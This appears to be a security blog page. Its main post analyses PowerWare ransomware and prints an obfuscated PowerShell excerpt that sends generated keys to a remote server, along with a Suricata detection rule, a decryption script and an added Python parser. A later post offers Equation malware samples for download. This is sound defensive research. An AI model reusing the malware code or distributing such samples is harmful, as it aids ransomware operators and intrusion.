2. If you count the number of file types that they encrypt (not shown for space reasons), you get 451 file types. Of these 451, most are found in both samples with the exception of five types, "*.amf", "*.qtiq", "*.srf", "*.val" and "*.waw". That works out to be slightly less than 1% difference in their two lists.

That being said, the two samples are not exact copies of each other; there are some differences in their codebases, as you will see below:

Excerpt from PowerWare

$GBCSWHJKIYRDVHH = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 50)) -join ""
$SGKPOTTHJMNFDRYJKJ = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 20)) -join ""
$SQEGJJYRFBNHFFHJ = ([ChaR[]](GeT-RandOm -Input $(48..57 + 65..90 + 97..122) -Count 25)) -join ""

$73848HhjhdRghx67Hhsh = New-Object -ComObject MsXml2.XMLHTTP
$73848HhjhdRghx67Hhsh.open('POST', $XCJHEDIJGDFJMVD, $false)
$73848HhjhdRghx67Hhsh.setRequestHeader("C"+"ontent-tYpe", "apPlicAtion/x-www-form-url"+"enCodeD")
$73848HhjhdRghx67Hhsh.setRequestHeader("ConteNt-length", $post.length)
$73848HhjhdRghx67Hhsh.setRequestHeader("CoNNeCtion", "close")
$73848HhjhdRghx67Hhsh.send($HGJHBVSRYUJNBGDRHJ)

3. PoshCoder variants featured some bad programming that made some files unrecoverable. Specifically, the script indicates that any file less than 42871 bytes in size will be encrypted completely but the larger files will only have the first 42871 bytes encrypted. That was an issue because the encryption will read in the first 42871 bytes from the file, encrypt them and then add 16 bytes of padding to reach the next boundary. Due to the padding, the overwritten bytes from 42872 to 42880 cannot be recovered. There was also the issue of the AES key not being properly padded when it was converted into a base64 string, so when decoded the variable would contain NULL or an empty value. Luckily, PowerWare doesn’t seem to have these issues, and the files are recoverable.

Decrypting PowerWare

As mentioned earlier, PowerWare transmits randomly generated values to a remote server in clear-text via a POST request using XMLHTTP. This makes the traffic easily decipherable by AlienVault USM, or another NIDS with a proper Suricata rule such as the one below:

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"AV TROJAN Ransomware PowerWare/Poshcoder CnC Checkin"; flow:established,to_server; content:"POST"; http_method; content:"Content-Type|3a| application/x-www-form-urlencoded"; http_header; nocase; content:".php"; http_uri; content:"string="; http_client_body; nocase; content:"&string2="; http_client_body; nocase; content:"&uuid="; http_client_body; nocase; reference:md5,4564d49eda7a048f301b1f87f9da3c62; classtype:trojan-activity; sid:12345678; rev:1;)

Which would, in theory, capture the traffic below:

To decrypt the files we need two things:

  1. The password used during encryption (string)
  2. The salt used during the encryption process (string2).

Using the values above for "string" and "string2" we can decrypt the files encrypted by PowerWare.

param(
  [string]$filename = $(Throw "Argument 'filename' required."),
  [string]$string1 = $(Throw "Please enter 'string'."),
  [string]$string2 = $(Throw "Please enter 'string2'.")
)

write-host "The entered filename is: $filename"
write-host "The entered Password is: $string1"
write-host "The entered Salt is: $string2"

# Rebuild the key and IV exactly as the ransomware does
$salt = [Text.Encoding]::UTF8.GetBytes($string2)
$Rijndael = new-Object System.Security.Cryptography.RijndaelManaged
$Rijndael.Key = (new-Object Security.Cryptography.Rfc2898DeriveBytes $string1, $salt, 5).GetBytes(32)
$Rijndael.IV = (new-Object Security.Cryptography.SHA1Managed).ComputeHash([Text.Encoding]::UTF8.GetBytes("alle") )[0..15]
$Rijndael.Padding="Zeros"
$Rijndael.Mode="CBC"

try{
  # Read at most the first 2048 bytes of the file
  $binReader = New-Object System.IO.BinaryReader([System.IO.File]::Open($filename, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
  if ($binReader.BaseStream.Length -lt 2048){
    $binReader_length = $binReader.BaseStream.Length
  }
  else
  {
    $binReader_length = 2048
  }
  $data = $binReader.ReadBytes($binReader_length)
  $binReader.Close()

  # Decrypt that block in memory
  $The_Decryptor = $Rijndael.CreateDecryptor()
  $memStream = new-Object IO.MemoryStream
  $cryptoStream = new-Object Security.Cryptography.CryptoStream $memStream,$The_Decryptor,"Write"
  $cryptoStream.Write($data, 0,$data.Length)
  $cryptoStream.Close()
  $memStream.Close()
  $The_Decryptor.Clear()
  $memStream_Array = $memStream.ToArray()

  # Write the decrypted bytes back over the start of the file
  $binWriter = New-Object System.IO.BinaryWriter([System.IO.File]::Open($filename, [System.IO.FileMode]::Open, [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::Read),[System.Text.Encoding]::ASCII)
  $binWriter.Write($memStream_Array,0,$memStream_Array.Length)
  $binWriter.Close()
}
catch
{
    write-host "Something broke, set debuggers to level 10"
}
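The fields the Suricata rule keys on are the same two values the decryptor takes as arguments. As an added example (not code from the original post), this Python code applies the rule's content matches to a raw HTTP request, extracts "string" and "string2", and derives the same key and IV as the PowerShell script above. The sample requests, host, path and field values are constructed, and the field order in the body is an assumption.

```python
import hashlib
from urllib.parse import parse_qs


def build_request(method, uri, content_type, body):
    """Assemble a raw HTTP/1.1 request; used only to construct the samples."""
    head = (f"{method} {uri} HTTP/1.1\r\n"
            "Host: c2.example.invalid\r\n"
            f"Content-tYpe: {content_type}\r\n"
            f"Content-Length: {len(body)}\r\n"
            "Connection: close\r\n\r\n")
    return (head + body).encode("latin-1")


# Constructed samples, not captured traffic. Host, path and values are invented.
SAMPLE_PASSWORD = "Zk3Vq9LmT0xYb7RcWd2NsHf5"
SAMPLE_SALT = "p8JtX1uGe4AoMw6Q"
SAMPLE_UUID = "h2DyB5nKr9"
CHECKIN = build_request(
    "POST", "/gate.php", "apPlicAtion/x-www-form-urlenCodeD",
    f"string={SAMPLE_PASSWORD}&string2={SAMPLE_SALT}&uuid={SAMPLE_UUID}")
BENIGN = build_request(
    "POST", "/login.php", "application/x-www-form-urlencoded",
    "user=alice&token=abc123")


def parse_request(raw):
    """Split a raw request into (method, uri, headers, body); None if malformed."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if not sep or len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return parts[0], parts[1], headers, body.decode("latin-1")


def matches_checkin(raw):
    """Apply the same content matches as the Suricata rule on the page."""
    parsed = parse_request(raw)
    if parsed is None:
        return False
    method, uri, headers, body = parsed
    body_l = body.lower()  # the body matches in the rule are nocase
    return (method == "POST"
            and ".php" in uri
            # nocase matters: the script sends a mixed-case header value
            and "application/x-www-form-urlencoded"
                in headers.get("content-type", "").lower()
            and all(k in body_l for k in ("string=", "&string2=", "&uuid=")))


def extract_recovery_params(raw):
    """Return the check-in fields as a dict, or None if this is not a check-in."""
    if not matches_checkin(raw):
        return None
    body = parse_request(raw)[3]
    parsed = parse_qs(body, keep_blank_values=True)
    fields = {k.lower(): v[0] for k, v in parsed.items()}
    wanted = ("string", "string2", "uuid")
    if any(name not in fields for name in wanted):
        return None
    return {name: fields[name] for name in wanted}


def derive_key_iv(password, salt):
    """Python equivalent of the Rfc2898DeriveBytes / SHA1Managed lines.

    Rfc2898DeriveBytes is PBKDF2 with HMAC-SHA1 over the UTF-8 password;
    the page's script uses 5 iterations and takes 32 bytes. The IV is the
    first 16 bytes of SHA1("alle").
    """
    key = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"),
                              salt.encode("utf-8"), 5, 32)
    iv = hashlib.sha1(b"alle").digest()[:16]
    return key, iv


if __name__ == "__main__":
    for label, raw in (("checkin", CHECKIN), ("benign", BENIGN)):
        params = extract_recovery_params(raw)
        if params is None:
            print(f"{label}: no match")
            continue
        key, iv = derive_key_iv(params["string"], params["string2"])
        print(f"{label}: match uuid={params['uuid']} "
              f"key={key.hex()} iv={iv.hex()}")
```

The IV is identical for every victim because it depends only on the constant "alle", so the captured "string" and "string2" are all that vary between infections.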

Samples Analyzed:


PowerWare, while it appears to be new, is heavily based on PoshCoder. More research is required, but this finding will hopefully assist security researchers in their efforts.


Posted: 4 Apr 2016 | 6:00 am

Equation samples - from the Kaspersky Report and additional

Here are a few samples from the report by Kaspersky Lab "Equation: The Death Star of Malware Galaxy" and additional samples of the same family. The full list is below

Download all the samples listed below. Email me if you need the password (New link)

FannyWorm_E78A4E8BECA2CCD7E77889B3BEDBB729e78a4e8beca2ccd7e77889b3bedbb729180 KB
FannyWorm_E762B8FCD20D62049DB35327D31D2709e762b8fcd20d62049db35327d31d2709180 KB
FannyWorm_E2320F490CBB2E082E699EBEB0FAA917e2320f490cbb2e082e699ebeb0faa917180 KB
FannyWorm_E4678EC7825DF4AC71E4F8DC9D806C7Be4678ec7825df4ac71e4f8dc9d806c7b180 KB
FannyWorm_E3515334BB2BCB77D10ECEEDD9661BEBe3515334bb2bcb77d10eceedd9661beb180 KB
FannyWorm_E33894883C1A1A5DDBE8E391225CD1FBe33894883c1a1a5ddbe8e391225cd1fb180 KB
FannyWorm_E81665906732C73D27F005157B552A43e81665906732c73d27f005157b552a43180 KB
FannyWorm_EA943C7CC83D853DE678C58B838FBD65ea943c7cc83d853de678c58b838fbd65180 KB
FannyWorm_EAFD1A95D51662C41577E5833F290875eafd1a95d51662c41577e5833f290875180 KB
FannyWorm_ECE7AA61BE647E85DDBE3B2A757837FAece7aa61be647e85ddbe3b2a757837fa180 KB
FannyWorm_ED2E8BD08B3A4B90383BCEC3A9B41273ed2e8bd08b3a4b90383bcec3a9b41273180 KB
FannyWorm_EE083C9213978F517E80FAA5C8557110ee083c9213978f517e80faa5c8557110180 KB
FannyWorm_EE119065AA37ED346DB35B62003A720Eee119065aa37ed346db35b62003a720e180 KB
FannyWorm_EEF3A1F9EAE6CBA0C00529A12B0666ABeef3a1f9eae6cba0c00529a12b0666ab180 KB
FannyWorm_F1ECC7FF709F4386C1A3D2FF448FD5F9f1ecc7ff709f4386c1a3d2ff448fd5f9180 KB
FannyWorm_F5AF8D37CABE19EF922306FD4A8F913Df5af8d37cabe19ef922306fd4a8f913d180 KB
FannyWorm_F5F92322B0EA96FE78A3755188EB669Ef5f92322b0ea96fe78a3755188eb669e180 KB
FannyWorm_F7DE4D38FE0FBCC9D362D471A5E0282Bf7de4d38fe0fbcc9d362d471a5e0282b180 KB
FannyWorm_F22CF337F70B2306F3CA740338086912f22cf337f70b2306f3ca740338086912180 KB
FannyWorm_F26CDE2983041867EDEF171AF7F7DA73f26cde2983041867edef171af7f7da73180 KB
FannyWorm_F30D4488E520C6DB3AE59A87EE0245B4f30d4488e520c6db3ae59a87ee0245b4180 KB
FannyWorm_F72B462536299D3063B1B2E1AD883429f72b462536299d3063b1b2e1ad883429180 KB
FannyWorm_F3417EFC13A1ED1284625CA97AA49377f3417efc13a1ed1284625ca97aa49377180 KB
FannyWorm_F4776D8F718F1BB836E6FBA9EBCB1E77f4776d8f718f1bb836e6fba9ebcb1e77180 KB
FannyWorm_F5879F2121AEE5E49DFA7B39FC97F073f5879f2121aee5e49dfa7b39fc97f073180 KB
FannyWorm_F8406D97147F90C3255AAA32452C7683f8406d97147f90c3255aaa32452c7683180 KB
FannyWorm_F38544F22C57F7969915FF1919AC882Ff38544f22c57f7969915ff1919ac882f180 KB
FannyWorm_F77534EBE9C8CCC5009B6A6BA06668CBf77534ebe9c8ccc5009b6a6ba06668cb180 KB
FannyWorm_F493229F25A16952CEA321FD932F6976f493229f25a16952cea321fd932f6976180 KB
FannyWorm_F4482216C514F5C59F1E9A91FBF84F3Af4482216c514f5c59f1e9a91fbf84f3a180 KB
FannyWorm_FA1A156581F808628696E300C28AB9ABfa1a156581f808628696e300c28ab9ab180 KB
FannyWorm_FA8C3438E459E7A437F5A2F551BA02CAfa8c3438e459e7a437f5a2f551ba02ca180 KB
FannyWorm_FB82E3DD585746B14A0489B5F10E22D2fb82e3dd585746b14a0489b5f10e22d2180 KB
FannyWorm_FCC3BCAD73BA57207CBF5CC00077E5B4fcc3bcad73ba57207cbf5cc00077e5b4180 KB
FannyWorm_FE53A01127659A1A1E6EB451B55FFCAAfe53a01127659a1a1e6eb451b55ffcaa180 KB
FannyWorm_FF7DA1D4CB2AA4ACC862033293BE699Cff7da1d4cb2aa4acc862033293be699c180 KB
FannyWorm_FFAD870F291ACCCBE148673F579689DBffad870f291acccbe148673f579689db180 KB
EquationLaser_0D1DC631B17DEED6E53D593DCC2E0CA10d1dc631b17deed6e53d593dcc2e0ca1130 KB
EquationLaser_2FE4D4BC00266089DB7EAC05D1F086202fe4d4bc00266089db7eac05d1f08620130 KB
EquationLaser_8E2C06B52F530C9F9B5C2C743A5BB28A8e2c06b52f530c9f9b5c2c743a5bb28a130 KB
EquationLaser_32C53DF631217D0B5F9F46D3A924671532c53df631217d0b5f9f46d3a9246715130 KB
EquationLaser_45DF8669908A259A22C44278C228972145df8669908a259a22c44278c2289721130 KB
EquationLaser_6480843080ADD60B825EFE0532DC727B6480843080add60b825efe0532dc727b130 KB
EquationLaser_C96284363374597A3AC4B07C77E8325Bc96284363374597a3ac4b07c77e8325b130 KB
EquationLaser_DE356F2A55B25E04742423B5EC56DE93de356f2a55b25e04742423b5ec56de93130 KB

Posted: 16 Mar 2016 | 9:18 pm

Script Deobfuscator Updated

Continuing from my last blog post, I updated the program to handle the latest obfuscated JavaScript technique. I made the logic generic in order to handle future versions and variants so the results may come out a bit weird (e.g. stray tick marks). But the main thing is that you’ll be able to see what these scripts are doing.

I broke out the concatenation option by script type so this should improve the results somewhat better than before.




I hope this works for most of the scripts you encounter. And thank you for your continued support!

Posted: 22 Feb 2016 | 7:24 pm

Freedome VPN For Mac OS X

Take a look at this:


F-Secure Freedome for OS X (freshly installed on a Labs Mac Team MacBook).


The beta is now open for everyone to try for 60 days at no cost.

Download or share.

On 24/04/15 At 12:37 PM

Posted: 24 Apr 2015 | 1:37 am

New Website for Cyber Engineering Services

If you’ve visited our website before, you may notice some changes this time around. Our old site served us well, but as we are moving forward as a company we felt it was time for a fresh new look for the website to reflect the fresh new ideas being developed in our company. Besides the attractive new color palette and flashy new slider, we’ve streamlined our content and cleaned things up. There are also a few new features to check out. You may have noticed Cyber Engineering Services in the news lately; we added a NEWS section where you can check out all the buzz and catch up on anything you missed. We have also added a section called LEADERSHIP where you can read a bit about the fearless leaders we have taking up the helm and keeping us on our toes here at Cyber Engineering Services.

If this is your first time visiting our site, look around and sample a few pages; we’ve tried our best to lay things out so it’s easy to find what you need quickly. If you still have questions, feel free to contact us; we’d love to talk with you. If you have suggestions for our website, feel free to comment below; we’d love to hear your feedback.

Posted: 3 Sep 2014 | 7:39 am